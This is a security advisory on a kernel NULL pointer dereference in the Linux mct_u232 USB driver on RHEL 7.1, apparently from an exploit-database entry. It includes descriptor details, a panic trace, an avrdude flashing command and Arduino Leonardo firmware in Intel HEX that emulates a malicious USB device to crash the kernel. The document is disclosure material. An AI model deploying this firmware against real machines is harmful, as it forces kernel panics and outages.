:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
:1012C000781F891F9A1FA11D680F791F8A1F911D02
:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:10142400000000404C0544010001010203010902CF
:10143400270001010000FA0705810104040C0705D7
:10144400010104000C0705820104000C07000700D9
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF

641
platforms/linux/dos/39541.txt Executable file
View file

@ -0,0 +1,641 @@
OS-S Security Advisory 2016-08
Linux mct_u232 Nullpointer Dereference
Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
USB device descriptors (mct_u232_m8 driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net/advisories/OSS-2016-08_mct_u232.pdf
Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
device requiring the mct_u232_m8 driver.
Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.
Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:
[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x50d
idProduct: 0x109
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1
This is the configuration descriptor containing only one interrupt-endpoint-
descriptor (IN-direction).
The mct_u232 driver assumes that there will be at least two endpoint-
descriptors configured as interrupt-in.
Since there is no sanity check, it is possible that the kernel tries to
dereference a null-pointer.
This results in a crash of the system.
****
$ nm mct_u232.ko.debug | grep mct_u232_port_probe
0000000000000fc0 t mct_u232_port_probe
$ addr2line -e mct_u232.ko.debug 0xFF9
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/drivers/usb/serial/mct_u232.c:386
****
**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/mct_u232.c)
...
377 static int mct_u232_port_probe(struct usb_serial_port *port)
378 {
379 struct mct_u232_private *priv;
380
381 priv = kzalloc(sizeof(*priv), GFP_KERNEL);
382 if (!priv)
383 return -ENOMEM;
384
385 /* Use second interrupt-in endpoint for reading. */
386 priv->read_urb = port->serial->port[1]->interrupt_in_urb; /* missing
sanity check -> possible null-pointer dereference */
387 priv->read_urb->context = port;
388
389 spin_lock_init(&priv->lock);
390
391 usb_set_serial_port_data(port, priv);
392
393 return 0;
395 }
...
****
[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x3
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81 ï?? IN-Direction
bmAttribut: 0x3 ï?? Interrupt-Transfer
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1 ï??OUT-Direction
bmAttribut: 0x2 ï??Bulk-Transfer
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82 ï??IN-Direction
bmAttribut: 0x1 ï??Bulk-Transfer
wMaxPacketSize: 0x4
bInterval: 0xc
Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex
The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!
Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.
Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this
Security Advisory.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283370
Kernel Stacktrace:
[ 2273.524650] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 2273.741789] usb 1-1: New USB device found, idVendor=050d, idProduct=0109
[ 2273.749429] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 2273.757144] usb 1-1: Product: Ä?
[ 2273.760821] usb 1-1: Manufacturer: Ä?
[ 2273.763500] usb 1-1: SerialNumber: %
[ 2273.768699] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc
says 96 microframes
[ 2273.814069] usbcore: registered new interface driver mct_u232
[ 2273.820979] usbserial: USB Serial support registered for MCT U232
[ 2273.833864] mct_u232 1-1:1.0: MCT U232 converter detected
[ 2273.838511] BUG: unable to handle kernel NULL pointer dereference at
0000000000000158
[ 2273.839330] IP: [<ffffffffa0393ff9>] mct_u232_port_probe+0x39/0x70 [mct_u232]
[ 2273.839330] PGD 0
[ 2273.839330] Oops: 0000 [#1] SMP
[ 2273.839330] Modules linked in: mct_u232(+) ip6t_rpfilter ip6t_REJECT
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 2273.839330] CPU: 0 PID: 8890 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 2273.839330] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 2273.839330] task: ffff88000f546660 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000
[ 2273.839330] RIP: 0010:[<ffffffffa0393ff9>] [<ffffffffa0393ff9>]
mct_u232_port_probe+0x39/0x70 [mct_u232]
[ 2273.839330] RSP: 0018:ffff88000f4cf908 EFLAGS: 00010286
[ 2273.839330] RAX: ffff88000d9b49a0 RBX: ffff88000c34e800 RCX: 0000000000000000
[ 2273.839330] RDX: 0000000000000000 RSI: ffff88000d9b49a0 RDI: ffff88000c34eab0
[ 2273.839330] RBP: ffff88000f4cf910 R08: 00000000000163c0 R09: ffff88000e401c00
[ 2273.839330] R10: ffffffffa0393fe3 R11: 0000000000000004 R12: 0000000000000000
[ 2273.839330] R13: ffff88000c34e800 R14: ffffffffa0396000 R15: ffffffffa0396000
[ 2273.839330] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 2273.839330] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 2273.839330] CR2: 0000000000000158 CR3: 000000000f70c000 CR4:
00000000000006f0
[ 2273.839330] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 2273.839330] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 2273.839330] Stack:
[ 2273.839330] ffff88000c34eab0 ffff88000f4cf940 ffffffff81461cf6 ffff88000c34eab0
[ 2273.839330] ffff88000c34eab0 ffffffffa0396028 ffff88000c34eab0 ffff88000f4cf968
[ 2273.839330] ffffffff813d30d7 ffffffffa0396028 ffff88000c34eab0 ffffffff813d33e0
[ 2273.839330] Call Trace:
[ 2273.839330] [<ffffffff81461cf6>] usb_serial_device_probe+0x56/0x110
[ 2273.839330] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 2273.839330] [<ffffffff813d33e0>] ? driver_probe_device+0x390/0x390
[ 2273.839330] [<ffffffff813d341b>] __device_attach+0x3b/0x40
[ 2273.839330] [<ffffffff813d0f1b>] bus_for_each_drv+0x6b/0xb0
[ 2273.839330] [<ffffffff813d2fd8>] device_attach+0x88/0xa0
[ 2273.839330] [<ffffffff813d22d8>] bus_probe_device+0x98/0xc0
[ 2273.839330] [<ffffffff813cfd64>] device_add+0x4c4/0x7a0
[ 2273.839330] [<ffffffff81460243>] usb_serial_probe+0x1123/0x1230
[ 2273.839330] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0
[ 2273.839330] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0
[ 2273.839330] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0
[ 2273.839330] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100
[ 2273.839330] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 2273.839330] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 2273.839330] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 2273.839330] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 2273.839330] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 2273.839330] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 2273.839330] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580
[ 2273.839330] [<ffffffffa0399000>] ? 0xffffffffa0398fff
[ 2273.839330] [<ffffffffa039901e>] usb_serial_module_init+0x1e/0x1000 [mct_u232]
[ 2273.839330] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 2273.839330] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 2273.839330] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 2273.839330] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 2273.839330] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 2273.839330] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 2273.839330] Code: 00 00 48 89 e5 53 48 89 fb 48 8b 3d aa 3e aa e1 e8 9d 7a
e1 e0 48 85 c0 74 38 48 8b 13 48 8d bb b0 02 00 00 48 89 c6 48 8b 52 28 <48>
8b 92 58 01 00 00 48 89 10 48 89 9a b0 00 00 00 c7 40 08 00
[ 2273.839330] RIP [<ffffffffa0393ff9>] mct_u232_port_probe+0x39/0x70 [mct_u232]
[ 2273.839330] RSP <ffff88000f4cf908>
[ 2273.839330] CR2: 0000000000000158
[ 2274.348716] ---[ end trace b239663354a1c556 ]---
[ 2274.356144] Kernel panic - not syncing: Fatal exception
[ 2274.357102] drm_kms_helper: panic occurred, switching back to text console
Arduino Leonardo Firmware:
:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
:10060000AB09809180008F7703C0809180008F7D3F
:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
